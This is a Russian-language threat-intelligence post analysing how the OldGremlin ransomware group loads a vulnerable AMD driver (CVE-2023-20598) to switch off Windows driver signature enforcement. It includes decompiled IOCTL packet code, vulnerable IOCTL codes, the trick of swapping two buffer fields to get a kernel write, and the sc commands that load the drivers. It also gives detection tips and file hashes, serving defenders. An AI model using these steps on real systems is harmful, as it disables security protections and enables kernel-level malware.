[ << ALL_FEED ]

OldGremlin with old tricks

Ещё в группе «Группировки»

  • Операция Chewbacca

    В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…

  • Din, din — кто там?

    Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку,…

  • We will croc you

    We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на…

  • Минус один пернатый вор — плюс сто очков рейтинга!

    Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности…

  • ⚡Фейковые новости — В С Ё

    ⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов,…

OldGremlin with old tricks

OldGremlin известна как группировка вымогателей 😭. Для остановки работы антивирусов (да и любых программ) загружает TinyKiller, состоящий из трех файлов:

🐾 patcher_pdfw.exe — патчер для загрузки avkd.sys;
🐾 avkd.sys — вредоносный драйвер;
🐾 PdFwKrnl.sys — легитимный драйвер AMD Radeon Driver, уязвимый для чтения и записи.

Патчер на самом деле эксплуатирует уязвимость CVE-2023-20598 в драйвере AMD для загрузки своего неподписанного драйвера 😉. Для этого используется старый трюк — обход защиты Driver Signature Enforcement (DSE), выключая внутренний флаг. В версиях Windows 8 до 9600 билда этот параметр назывался nt!g_CiEnabled и находился в ntoskrnl.exe. В последующих версиях за проверку подписи отвечал внутренний параметр CI!g_CiOptions из CI.dll.

Процесс получения адреса этого параметра достаточно трудоемок 😫 и полностью описан в рамках этой статьи. Получив адрес флага, патчер использует уязвимый драйвер.

Если посмотреть обработчик сообщений, то уязвимыми для чтения и записи являются ioctl 0x80002014, 0x80002020, 0x80002028 и 0x8000202C 😨. Злоумышленник использует первый вариант и составляет пакет для отправки драйверу:

  BytesReturned = 0;
  v5 = Msg;
  for ( i = 0xCi64; i; --i )
    *v5++ = 0;
  *(_QWORD *)&Msg[0x18] = address;
  *(_DWORD *)&Msg[0x28] = size; // eq 4
  *(_QWORD *)&Msg[0x10] = output; 
  return DeviceIoControl(hDevice, 0x80002014, Msg, 0x30u, Msg, 0x30u, &BytesReturned, 0i64);

Здесь address — это найденный ранее offset флага. Внутри драйвера это сообщение попадает в следующий обработчик, выполняющий прямой memmove значения address в output:

mov     r8d, [IRP+28h]  ; MaxCount
mov     rdx, [IRP+18h]  ; Src
mov     rcx, [IRP+10h]  ; Dst
call    memmove

Очевидно 😆, чтобы отключить флаг проверки подписи и записать по этому адресу 0=disabled, необходимо просто поменять местами значения Msg[0x18] и Msg[0x10]. После запуска вредоносного драйвера значение флага проверки подписи возвращают на место и выгружают из системы уязвимый драйвер.

Техника взятия с собой уязвимого драйвера (BYOVD) все чаще используется злоумышленниками для различных целей 😶. Большинство из них используют уже известные уязвимые драйверы, наличие которых можно обнаружить при помощи LOLDrivers или настройки списков исключений от Microsoft. Кроме того, стоит обращать внимание на запуск служб драйверов 😌.

OldGremlin используют следующие команды для загрузки уязвимого драйвера и своего:

sc create vprovdrv binpath= "<path>\PdFwKrnl.sys" type= "kernel
sc start vprovdrv

sc create avkdriver binpath= "<path>\avkd.sys" type= "kernel
sc start avkdriver

IoCs

avkd.sys
eac69feccd33f6b97f7b60c1ded22d2b7f689921b28e531e7c2a925c09ce0936

patcher_pdwf.exe
116fbf458c1062303c2630116f8cad23d394106a5ddcc6d687f0f33dbe17a492
d236bfc015e735a64ad3c2d447fa70926b898a4e9b9af11f94b83ce768bbd434

PdFwKrnl.sys
0cf84400c09582ee2911a5b1582332c992d1cd29fcf811cb1dc00fcd61757db0
6945077a6846af3e4e2f6a2f533702f57e993c5b156b6965a552d6a5d63b7402

#APT #ioc
@ptescalator

Ещё от global_author

  • Этот ваш Siemens…

    Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его…

  • Анти-антивирус

    Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его,…

  • .exe .docm .xlsm

    .exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте…

  • Хаос, шок, приватные ключи от не менее приватного GitLab 💻

    Последние пару месяцев злоумышленник распространял трояны с нескольких npm-учеток: alex05255, mdrafiqulislamrabby, b.w1001, abdev8773 и mollspotwood54400. Список…

  • ::%16777216 — так что же ты такое?

    ::%16777216 — так что же ты такое? Известно, что в ходе атак злоумышленники могут использовать туннелирование.…

Ещё от global_author

  • Этот ваш Siemens…

    Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его…

  • Анти-антивирус

    Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его,…

  • .exe .docm .xlsm

    .exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте…

  • Хаос, шок, приватные ключи от не менее приватного GitLab 💻

    Последние пару месяцев злоумышленник распространял трояны с нескольких npm-учеток: alex05255, mdrafiqulislamrabby, b.w1001, abdev8773 и mollspotwood54400. Список…

  • ::%16777216 — так что же ты такое?

    ::%16777216 — так что же ты такое? Известно, что в ходе атак злоумышленники могут использовать туннелирование.…

Ещё в группе «Группировки»

  • Операция Chewbacca

    В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум…

  • Din, din — кто там?

    Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку,…

  • We will croc you

    We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на…

  • Минус один пернатый вор — плюс сто очков рейтинга!

    Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности…

  • ⚡Фейковые новости — В С Ё

    ⚡Фейковые новости — В С Ё Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов,…